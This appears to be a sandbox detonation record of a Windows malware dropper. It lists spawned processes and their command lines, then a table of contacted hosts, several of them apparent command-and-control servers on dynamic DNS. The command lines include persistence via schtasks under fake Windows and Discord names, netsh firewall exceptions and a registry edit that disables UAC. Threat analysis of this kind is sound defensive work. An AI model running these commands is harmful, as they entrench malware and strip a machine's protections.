"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Users\Admin\AppData\Local\Temp\a\333.exe
"C:\Users\Admin\AppData\Local\Temp\a\333.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\csGMovlsCz1U.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\NFL5X40U9rBT.bat" "
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\gGd6Sc0CVxKo.bat" "
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\yP7ocPgnzpZX.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {84918601-C221-4502-93B5-1C459B54D35C} S-1-5-21-312935884-697965778-3955649944-1000:MXQFNXLT\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\Network.exe
C:\Users\Admin\AppData\Roaming\Network.exe
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\txmSbpHR1z93.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\5CN0SmO4YDaR.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "651472643-1851480589-1118793646175173931221757700610928288111902706164902750728"
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\zE5EsdTQVLTE.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RH1PaQhQWwXm.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\hrQrQWtmNAup.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "933312609-406731408-1790982925-15858158391545171218-1087195369-874683945-276761312"
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\XxLvY69ABsZF.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\H0JK71MDoDiA.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\NLqbDa60jHZY.bat" "
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe
"C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe
"C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-380592931794380694-599577954-1813269182775463150-1857120456-12712435401267113664"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe
"C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\S0Ahb7wqiLdU.bat" "
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe
"C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\hEb9H3hRUfd2.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1075484357-329037004-210092016729264460814665411141886277669-3823256481606935560"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 888 -s 1164
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\1gDcq6KwkC4i.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Roaming\Network.exe
C:\Users\Admin\AppData\Roaming\Network.exe
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\j6z7JyGJ60PR.bat" "
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\4ZAVHlJm6aW9.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe
"C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe
"C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\QZQBLEqosfSN.bat" "
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1172
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe
"C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\mgfpRTWIUj34.bat" "
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1096 -s 1460
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\a\Servers.exe
"C:\Users\Admin\AppData\Local\Temp\a\Servers.exe"
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "5483645295594997681410652334-1960867418-73037143113541422541004129646-983109749"
C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe
"C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ppDiKTAIxf8s.bat" "
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\q55bgR7thNVT.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\X5hI9T69oF0z.bat" "
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe
"C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\a\mac.exe
"C:\Users\Admin\AppData\Local\Temp\a\mac.exe"
C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe
"C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
C:\ProgramData\GoogleDat\GoogleUpdate.exe
C:\ProgramData\GoogleDat\GoogleUpdate.exe
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\svchost.exe
svchost.exe
C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe
"C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\a\Discord.exe
"C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "146272486713716370342146452761-283201182191764725351370645312104548451266761744"
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\uTBZJw95QmYA.bat" "
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 1436
C:\Users\Admin\AppData\Local\Temp\a\Client-base.exe
"C:\Users\Admin\AppData\Local\Temp\a\Client-base.exe"
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1623540158-857654453-1397294642-1169686346-53308944714274225182089971389-345946265"
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\W0OTT0ZRdELW.bat" "
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\QCGANXGlRZof.bat" "
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\3wSQiyOdnYt3.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.194.49:443 | urlhaus.abuse.ch | tcp |
| US | 151.101.194.49:443 | urlhaus.abuse.ch | tcp |
| DE | 5.252.155.72:80 | 5.252.155.72 | tcp |
| DE | 185.208.159.240:8080 | 185.208.159.240 | tcp |
| DE | 185.208.159.240:8080 | 185.208.159.240 | tcp |
| US | 8.8.8.8:53 | maerchen-beat-frei.ch | udp |
| US | 45.42.212.91:443 | maerchen-beat-frei.ch | tcp |
| CH | 95.183.50.117:80 | 95.183.50.117 | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| TR | 45.138.183.226:80 | 45.138.183.226 | tcp |
| US | 8.8.8.8:53 | plunder.dedyn.io | udp |
| US | 8.8.8.8:53 | OMTkTMNzXANwD.OMTkTMNzXANwD | udp |
| TR | 216.9.224.66:5000 | plunder.dedyn.io | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| HK | 121.127.231.166:80 | 121.127.231.166 | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| CN | 124.221.100.215:80 | tcp | |
| CY | 213.133.94.133:4444 | tcp | |
| US | 8.8.8.8:53 | else-directors.gl.at.ply.gg | udp |
| US | 147.185.221.23:56448 | else-directors.gl.at.ply.gg | tcp |
| FI | 95.217.240.67:443 | 95.217.240.67 | tcp |
| DE | 185.208.159.240:56001 | tcp | |
| FI | 95.217.240.67:443 | 95.217.240.67 | tcp |
| FI | 95.217.240.67:443 | 95.217.240.67 | tcp |
| DE | 147.45.44.131:80 | 147.45.44.131 | tcp |
| TR | 45.138.183.226:80 | 45.138.183.226 | tcp |
| TR | 45.138.183.226:80 | 45.138.183.226 | tcp |
| US | 8.8.8.8:53 | dash.3utilities.com | udp |
| US | 8.8.8.8:53 | dash1.3utilities.com | udp |
| US | 8.8.8.8:53 | dash2.ddns.net | udp |
| US | 8.8.8.8:53 | xred.mooo.com | udp |
| US | 8.8.8.8:53 | bash.mywire.org | udp |
| US | 192.188.88.248:2404 | bash.mywire.org | tcp |
| US | 8.8.8.8:53 | freedns.afraid.org | udp |
| US | 69.42.215.252:80 | freedns.afraid.org | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | bash1.accesscam.org | udp |
| US | 192.188.88.248:2404 | bash1.accesscam.org | tcp |
| US | 8.8.8.8:53 | tuna91.duckdns.org | udp |
| US | 8.8.8.8:53 | dash3.ddns.net | udp |
| TR | 176.232.184.98:1604 | tuna91.duckdns.org | tcp |
| US | 8.8.8.8:53 | dash4.ddns.net | udp |
